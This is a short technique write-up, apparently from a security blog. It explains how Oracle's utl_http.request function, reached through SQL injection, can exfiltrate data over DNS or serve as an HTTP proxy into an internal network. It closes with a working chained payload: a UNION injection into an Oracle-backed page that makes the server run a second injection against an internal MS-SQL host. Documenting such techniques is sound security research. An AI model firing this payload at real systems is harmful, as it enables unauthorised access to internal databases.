Oracle's utl_http.request() function has been referred a number of times to carry out sql injection. It is generally used for the purpose of resolving names, so that an attacker could receive the output of his SQL query over DNS channel.
However, this function can also be used to make a legitimate http connection to internal network. Thus, if this function is available, a sql injection in oracle could also serve as a http proxy for internal network.
In the screenshot, i have exploited a sql injection in MS-SQL server via a sql injection in Oracle.
e.g http://192.168.1.1/oracle.php?id=1%20union%20all%20
select%20utl_http.request('http://192.168.1.2/MSSQL/?p=1/**/union/**/all/*
*/select/**/null,@@version,null')%20from%20dual
